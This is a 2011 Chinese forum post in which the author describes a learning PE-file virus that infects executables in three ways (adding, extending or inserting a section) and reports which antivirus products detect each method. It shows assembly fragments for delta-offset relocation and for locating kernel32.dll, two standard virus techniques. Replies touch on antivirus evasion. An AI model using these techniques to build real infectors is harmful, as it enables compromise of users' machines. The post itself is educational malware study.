-
-
[原创]PE文件病毒初探
-
发表于: 2011-7-17 11:19
-
【文章标题】: PE文件病毒初探
【文章作者】: loongzyd
【下载地址】: 见附件
【使用工具】: RadAsm Peid
【参考】:《加密与解密》第三版,《计算机病毒分析与防治简明教程》
PE格式大致温习一下之后开始按照教材上的进度进入PE文件病毒的学习,程序实现了"添加节方式修改PE","加长最后一节修改PE","插入节方式修改PE"三种方式。感染之后只是在程序运行正常功能之前谈出一个对话框,在没有经过处理的情况下,被感染的.exe文件都被360报毒,小红伞对第三种方式感染的.exe文件没有报毒。
我们先来看看程序感染之前的情况: 第一种方式感染之后的情况:
第二种方式感染之后的情况: 第三种方式感染之后的情况:
程序的流程 
感染之后运行情况:
重定位:
Call @F @@: pop ebx sub ebx,offset @B
GetKernelBase proc _dwKernelRet:DWORD LOCAL @dwReturn:DWORD pushad mov @dwReturn,0 ;****************************************************** ;查找Kernel32.dll的基地址 ;****************************************************** mov edi,_dwKernelRet and edi,0ffff0000h .while TRUE .if word ptr [edi] == IMAGE_DOS_SIGNATURE mov esi,edi add esi,[esi+003ch] ;e_lfanew字段的偏移为3c .if word ptr [esi] == IMAGE_NT_SIGNATURE mov @dwReturn,edi .break .endif .endif _PageError: sub edi,01000h .break .if edi < 07000000h .endw popad mov eax,@dwReturn ret _GetKernelBase endp
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
|
|
|---|---|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
恩恩,自己对杀毒软件的情况不了解,免杀基本没有学习.... 谢谢你建议,下来会增加整个功能的...
还有很多需要学习的,请多多指教。  ps:其实感觉把节的大小增加比把代码加到节的空闲区间更危险吧。(没有任何依据,个人yy) |
|
|
|
